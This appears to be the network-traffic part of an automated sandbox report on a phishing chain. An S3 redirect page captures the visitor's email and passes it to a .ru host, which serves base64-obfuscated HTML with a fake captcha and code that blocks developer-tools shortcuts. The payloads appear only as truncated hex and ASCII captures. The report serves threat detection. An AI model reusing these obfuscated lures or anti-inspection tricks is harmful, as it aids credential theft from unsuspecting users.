                                                    Jan 15, 2025 04:47:12.799657106 CET5663453192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:47:12.804852962 CET53566341.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:47:13.281836033 CET53566341.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:47:13.282326937 CET5663453192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:47:13.287686110 CET53566341.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:47:13.287898064 CET5663453192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:47:18.556253910 CET44359771216.58.206.36192.168.2.4
                                                    Jan 15, 2025 04:47:18.556379080 CET44359771216.58.206.36192.168.2.4
                                                    Jan 15, 2025 04:47:18.556632996 CET59771443192.168.2.4216.58.206.36
                                                    Jan 15, 2025 04:47:19.787461042 CET59771443192.168.2.4216.58.206.36
                                                    Jan 15, 2025 04:47:19.787525892 CET44359771216.58.206.36192.168.2.4
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 15, 2025 04:45:49.864873886 CET5022353192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:45:55.991725922 CET138138192.168.2.4192.168.2.255
                                                    Jan 15, 2025 04:46:03.572623014 CET6544553192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:03.572688103 CET5767153192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:03.580909967 CET53623781.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:03.582742929 CET53576711.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:03.583719969 CET53654451.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:03.587412119 CET53626771.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:04.604435921 CET53563181.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:05.386466980 CET5982253192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:05.386537075 CET5770153192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:05.401702881 CET53598221.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:05.454051018 CET53577011.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:07.041918039 CET6056553192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:07.042112112 CET5627353192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:07.049226046 CET53605651.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:07.049269915 CET53562731.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:07.863220930 CET6070353192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:07.863641977 CET5157353192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:07.870595932 CET53607031.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:07.871143103 CET53515731.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:07.929987907 CET5557653192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:07.930396080 CET5486053192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:07.937463045 CET53555761.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:07.938103914 CET53548601.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:07.939174891 CET53635641.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:08.239075899 CET6180853192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:08.239180088 CET5701653192.168.2.41.1.1.1
                                                    Jan 15, 2025 04:46:08.246603966 CET53570161.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:08.247173071 CET53618081.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:15.839922905 CET53531791.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:21.825309992 CET53624811.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:40.639076948 CET53651701.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:46:44.683548927 CET53558981.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:47:01.715042114 CET53509081.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:47:03.280133963 CET53539871.1.1.1192.168.2.4
                                                    Jan 15, 2025 04:47:12.792797089 CET53602361.1.1.1192.168.2.4
                                                    TimestampSource IPDest IPChecksumCodeType
                                                    Jan 15, 2025 04:46:05.454277992 CET192.168.2.41.1.1.1c27c(Port unreachable)Destination Unreachable
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 15, 2025 04:45:49.864873886 CET192.168.2.41.1.1.10xe9afStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.572623014 CET192.168.2.41.1.1.10x39e8Standard query (0)oulkiate.s3.ap-southeast-1.amazonaws.comA (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.572688103 CET192.168.2.41.1.1.10xd0ffStandard query (0)oulkiate.s3.ap-southeast-1.amazonaws.com65IN (0x0001)false
                                                    Jan 15, 2025 04:46:05.386466980 CET192.168.2.41.1.1.10xbd03Standard query (0)sgd.trilivarnor.ruA (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:05.386537075 CET192.168.2.41.1.1.10x5d4fStandard query (0)sgd.trilivarnor.ru65IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.041918039 CET192.168.2.41.1.1.10xddefStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.042112112 CET192.168.2.41.1.1.10x99d0Standard query (0)code.jquery.com65IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.863220930 CET192.168.2.41.1.1.10xa228Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.863641977 CET192.168.2.41.1.1.10x9efeStandard query (0)code.jquery.com65IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.929987907 CET192.168.2.41.1.1.10x8b55Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.930396080 CET192.168.2.41.1.1.10x5f34Standard query (0)www.google.com65IN (0x0001)false
                                                    Jan 15, 2025 04:46:08.239075899 CET192.168.2.41.1.1.10xa49cStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:08.239180088 CET192.168.2.41.1.1.10x92faStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 15, 2025 04:45:49.873703957 CET1.1.1.1192.168.2.40xe9afNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                    Jan 15, 2025 04:45:50.560925961 CET1.1.1.1192.168.2.40x3e82No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:45:50.560925961 CET1.1.1.1192.168.2.40x3e82No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.582742929 CET1.1.1.1192.168.2.40xd0ffNo error (0)oulkiate.s3.ap-southeast-1.amazonaws.coms3-r-w.ap-southeast-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.583719969 CET1.1.1.1192.168.2.40x39e8No error (0)oulkiate.s3.ap-southeast-1.amazonaws.coms3-r-w.ap-southeast-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.583719969 CET1.1.1.1192.168.2.40x39e8No error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.125.106A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.583719969 CET1.1.1.1192.168.2.40x39e8No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.147.144A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.583719969 CET1.1.1.1192.168.2.40x39e8No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.148.123A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.583719969 CET1.1.1.1192.168.2.40x39e8No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.146.158A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.583719969 CET1.1.1.1192.168.2.40x39e8No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.150.157A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.583719969 CET1.1.1.1192.168.2.40x39e8No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.150.110A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.583719969 CET1.1.1.1192.168.2.40x39e8No error (0)s3-r-w.ap-southeast-1.amazonaws.com52.219.164.154A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:03.583719969 CET1.1.1.1192.168.2.40x39e8No error (0)s3-r-w.ap-southeast-1.amazonaws.com3.5.146.202A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:05.401702881 CET1.1.1.1192.168.2.40xbd03No error (0)sgd.trilivarnor.ru104.21.18.22A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:05.401702881 CET1.1.1.1192.168.2.40xbd03No error (0)sgd.trilivarnor.ru172.67.179.163A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:05.454051018 CET1.1.1.1192.168.2.40x5d4fNo error (0)sgd.trilivarnor.ru65IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.049226046 CET1.1.1.1192.168.2.40xddefNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.049226046 CET1.1.1.1192.168.2.40xddefNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.049226046 CET1.1.1.1192.168.2.40xddefNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.049226046 CET1.1.1.1192.168.2.40xddefNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.870595932 CET1.1.1.1192.168.2.40xa228No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.870595932 CET1.1.1.1192.168.2.40xa228No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.870595932 CET1.1.1.1192.168.2.40xa228No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.870595932 CET1.1.1.1192.168.2.40xa228No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.937463045 CET1.1.1.1192.168.2.40x8b55No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                    Jan 15, 2025 04:46:07.938103914 CET1.1.1.1192.168.2.40x5f34No error (0)www.google.com65IN (0x0001)false
                                                    Jan 15, 2025 04:46:08.247173071 CET1.1.1.1192.168.2.40xa49cNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                    • oulkiate.s3.ap-southeast-1.amazonaws.com
                                                    • https:
                                                      • sgd.trilivarnor.ru
                                                      • code.jquery.com
                                                    • a.nel.cloudflare.com
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.44975452.219.125.1064438796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-15 03:46:04 UTC693OUTGET /index.html HTTP/1.1
                                                    Host: oulkiate.s3.ap-southeast-1.amazonaws.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    sec-ch-ua-platform: "Windows"
                                                    Upgrade-Insecure-Requests: 1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: navigate
                                                    Sec-Fetch-User: ?1
                                                    Sec-Fetch-Dest: document
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-01-15 03:46:05 UTC414INHTTP/1.1 200 OK
                                                    x-amz-id-2: 40daFLr2+D9nsFeaJsag7m56fWSAfMbzt6P5VAPRU69UBwzinTax2fDv8Htah6faYEH7Bh5wbAQ=
                                                    x-amz-request-id: EXAW9QD3XDSPA9Z4
                                                    Date: Wed, 15 Jan 2025 03:46:06 GMT
                                                    Last-Modified: Tue, 14 Jan 2025 16:02:42 GMT
                                                    ETag: "374264dc6a4950b7c5957b44c2604c8e"
                                                    x-amz-server-side-encryption: AES256
                                                    Accept-Ranges: bytes
                                                    Content-Type: text/html
                                                    Content-Length: 1071
                                                    Server: AmazonS3
                                                    Connection: close
                                                    2025-01-15 03:46:05 UTC1071INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 52 65 64 69 72 65 63 74 20 77 69 74 68 20 45 6d 61 69 6c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 63 61 70 74 75 72 65 20 74 68 65 20 70 61 74 68 20 28 65 2e 67 2e 2c 20 61 61 40 61 61 2e 63 6f 6d 29 20 61 6e 64
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Redirect with Email</title> <script> // Function to capture the path (e.g., aa@aa.com) and


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449759104.21.18.224438796C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-15 03:46:05 UTC716OUTGET /NiKU3ISg/ HTTP/1.1
                                                    Host: sgd.trilivarnor.ru
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    sec-ch-ua-platform: "Windows"
                                                    Upgrade-Insecure-Requests: 1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Sec-Fetch-Site: cross-site
                                                    Sec-Fetch-Mode: navigate
                                                    Sec-Fetch-Dest: document
                                                    Referer: https://oulkiate.s3.ap-southeast-1.amazonaws.com/
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2025-01-15 03:46:06 UTC1246INHTTP/1.1 200 OK
                                                    Date: Wed, 15 Jan 2025 03:46:06 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Cache-Control: no-cache, private
                                                    cf-cache-status: DYNAMIC
                                                    vary: accept-encoding
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XrNF3GGnq2vUl%2B5yBrO1yctP%2FhLTPCF0KisyVRNF6ewVTwRz2410mhrPgY4jgVc%2F2ZBU1On%2F8mml0t7uMYTYbV5oDw0Gx9SKxv%2FUSLcNrergEPw9d0Ymk5SJKN2HZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=4867&min_rtt=4850&rtt_var=1395&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1626&delivery_rate=576985&cwnd=251&unsent_bytes=0&cid=8c47ec111cfaf904&ts=320&x=0"
                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6InRCQTNLMWlndFdNall2QTRXWThOUEE9PSIsInZhbHVlIjoiSm9ybnVSZkw2SStNL1M1ZVU3bDJncW1HMjNMMmhEZ1ZOZ05xOEFldUxXWFBNOHJkY3JGY3cwWFFTZ09Ccm01K2cvTnU1cXVNSlUrRUk4YU9vcGtMQ3dVV24zZmNGZHVUaXdLRHFaK0lnVWpvL21rUjFaQ1FBbUVTNTg5ZFVKd0EiLCJtYWMiOiI4MTc2OTIxYWFkMTVhMDg0YWU1NWY4MjRjOTA1YjQwODczYjNhZWU1NzIwNzYwMjlmODg1N2NkYWY1ZDU1MGU3IiwidGFnIjoiIn0%3D; expires=Wed, 15-Jan-2025 05:46:06 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                    2025-01-15 03:46:06 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 69 74 6c 61 6c 56 57 4d 55 52 7a 5a 58 59 35 61 58 42 61 57 47 39 58 64 57 68 6a 57 6d 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 64 6c 46 33 55 31 56 34 4d 69 74 43 4e 6e 46 73 54 58 6c 61 5a 6c 4e 57 4c 7a 6c 4c 55 6d 63 30 5a 33 4e 6d 55 7a 46 4b 4d 31 42 30 57 6b 64 54 54 57 31 4f 5a 33 70 4f 54 57 64 4e 51 32 74 4f 65 57 74 6b 56 57 35 34 54 44 6c 4a 61 6b 35 6c 59 30 5a 69 59 30 39 6f 4d 6a 4e 7a 62 57 56 48 51 6c 4e 70 62 6e 5a 75 56 54 42 36 65 46 52 45 65 47 68 45 61 6e 46 79 62 33 52 53 61 45 74 49 55 48 51 35 51 32 73 79 56 48 68 46 4d 56 70 53 56 33 6c 4c 4f 47 67 32 65 57 6b 31 62 57 52 52 57 43 74 43 61 30 73 30 63 58 51
                                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IitlalVWMURzZXY5aXBaWG9XdWhjWmc9PSIsInZhbHVlIjoidlF3U1V4MitCNnFsTXlaZlNWLzlLUmc0Z3NmUzFKM1B0WkdTTW1OZ3pOTWdNQ2tOeWtkVW54TDlJak5lY0ZiY09oMjNzbWVHQlNpbnZuVTB6eFREeGhEanFyb3RSaEtIUHQ5Q2syVHhFMVpSV3lLOGg2eWk1bWRRWCtCa0s0cXQ
                                                    2025-01-15 03:46:06 UTC1369INData Raw: 62 61 36 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 54 5a 32 51 75 64 48 4a 70 62 47 6c 32 59 58 4a 75 62 33 49 75 63 6e 55 76 54 6d 6c 4c 56 54 4e 4a 55 32 63 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62 43 42 73 59 57 35 6e 50 53 4a 6c 62 69 49 2b 44 51 6f 38 61 47 56 68 5a 44 34 4e 43 69 41 67 49 43 41 38 63 32 4e 79 61 58 42 30 49 48 4e 79 59 7a 30 69 61 48 52 30 63 48 4d 36 4c 79 39 6a 62 32 52 6c 4c 6d 70 78 64 57 56 79 65 53 35 6a 62 32 30 76 61 6e 46
                                                    Data Ascii: ba6<script>if(atob("aHR0cHM6Ly9TZ2QudHJpbGl2YXJub3IucnUvTmlLVTNJU2cv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF
                                                    2025-01-15 03:46:06 UTC1369INData Raw: 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 64 32 68 70 64 47 55 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 79 4e 48 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 57 4a 76 65 43 42 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4f 69 41 6a 4d 44 41 77 4d 44 41 77 4f 47 45 37 44 51 6f 67 49 43 41 67 5a 6d 78 6c
                                                    Data Ascii: nRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhLWJveCB7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBiYWNrZ3JvdW5kOiAjMDAwMDAwOGE7DQogICAgZmxl
                                                    2025-01-15 03:46:06 UTC251INData Raw: 77 67 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 68 6c 59 32 74 74 59 58 4a 72 4f 6a 70 68 5a 6e 52 6c 63 69 42 37 44 51 6f 67 49 43 41 67 59 32 39 75 64 47 56 75 64 44 6f 67 49 69 49 37 44 51 6f 67 49 43 41 67 63 47 39 7a 61 58 52 70 62 32 34 36 49 47 46 69 63 32 39 73 64 58 52 6c 4f 77 30 4b 49 43 41 67 49 47 78 6c 5a 6e 51 36 49 44 56 77 65 44 73 4e 43 69 41 67 49 43 42 30 62 33 41 36 49 44 46 77 65 44 73 4e 43 69 41 67 49 43 42 33 61 57 52 30 61 44 6f 67 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 4a 77 65 44 73 4e 43 69 41 67 49 43 42 69 62 33 4a 6b 5a 58 49 36 49 48 4e 76 62 47 6c 6b 49 43 4d 30 59 32 46 6d 4e 54 41 37 44 51 6f 67 49 43 41 67 59 6d 39 79 5a 47 56 79 4c 58 64 70 5a 48 52 6f 4f 69 41 0d 0a
                                                    Data Ascii: wgLmNhcHRjaGEtY2hlY2ttYXJrOjphZnRlciB7DQogICAgY29udGVudDogIiI7DQogICAgcG9zaXRpb246IGFic29sdXRlOw0KICAgIGxlZnQ6IDVweDsNCiAgICB0b3A6IDFweDsNCiAgICB3aWR0aDogNnB4Ow0KICAgIGhlaWdodDogMTJweDsNCiAgICBib3JkZXI6IHNvbGlkICM0Y2FmNTA7DQogICAgYm9yZGVyLXdpZHRoOiA
                                                    2025-01-15 03:46:06 UTC1369INData Raw: 62 35 39 0d 0a 77 49 44 4e 77 65 43 41 7a 63 48 67 67 4d 44 73 4e 43 69 41 67 49 43 42 30 63 6d 46 75 63 32 5a 76 63 6d 30 36 49 48 4a 76 64 47 46 30 5a 53 67 30 4e 57 52 6c 5a 79 6b 37 44 51 70 39 44 51 6f 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c 58 52 6c 65 48 51 67 65 77 30 4b 49 43 41 67 49 47 5a 76 62 6e 51 74 5a 6d 46 74 61 57 78 35 4f 69 42 42 63 6d 6c 68 62 43 77 67 63 32 46 75 63 79 31 7a 5a 58 4a 70 5a 6a 73 4e 43 69 41 67 49 43 42 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 30 63 48 67 37 44 51 6f 67 49 43 41 67 62 47 56 6d 64 44 6f 67 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 47 4e 76 62 47 39 79 4f 69 41 6a 5a 6d 5a 6d 5a 6d 5a 6d 4f 77 30 4b 49 43 41 67 49 48 42 76 63 32 6c 30 61 57 39 75 4f 69 42 79 5a 57 78 68 64 47 6c 32 5a 54 73 4e 43
                                                    Data Ascii: b59wIDNweCAzcHggMDsNCiAgICB0cmFuc2Zvcm06IHJvdGF0ZSg0NWRlZyk7DQp9DQoNCi5jYXB0Y2hhLXRleHQgew0KICAgIGZvbnQtZmFtaWx5OiBBcmlhbCwgc2Fucy1zZXJpZjsNCiAgICBmb250LXNpemU6IDE0cHg7DQogICAgbGVmdDogNnB4Ow0KICAgIGNvbG9yOiAjZmZmZmZmOw0KICAgIHBvc2l0aW9uOiByZWxhdGl2ZTsNC
                                                    2025-01-15 03:46:06 UTC1369INData Raw: 77 59 57 52 6b 61 57 35 6e 4f 69 41 31 63 48 67 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 78 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 67 30 4b 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 39 75 64 47 56 75 64 43 42 69 64 58 52 30 62 32 34 67 65 77 30 4b 49 43 41 67 49 48 42 68 5a 47 52 70 62 6d 63 36 49 44 56 77 65 43 41 78 4d 48 42 34 4f 77 30 4b 49 43 41 67 49 47 5a 76 62 6e 51 74 63 32 6c 36 5a 54 6f 67 4d 54 5a 77 65 44 73 4e 43 69 41 67 49 43 42 69 59 57 4e 72 5a 33 4a 76 64 57 35 6b 4c 57 4e 76 62 47 39 79 4f 69 41 6a 4e 45 4e 42 52 6a 55 77 4f 77 30 4b 49 43 41 67 49 47 4e 76 62 47 39 79 4f 69 42 33 61 47 6c 30 5a 54 73 4e 43 69
                                                    Data Ascii: wYWRkaW5nOiA1cHg7DQogICAgZm9udC1zaXplOiAxNnB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCg0KLmNhcHRjaGEtY29udGVudCBidXR0b24gew0KICAgIHBhZGRpbmc6IDVweCAxMHB4Ow0KICAgIGZvbnQtc2l6ZTogMTZweDsNCiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjNENBRjUwOw0KICAgIGNvbG9yOiB3aGl0ZTsNCi
                                                    2025-01-15 03:46:06 UTC174INData Raw: 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 0d 0a
                                                    Data Ascii: IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQu
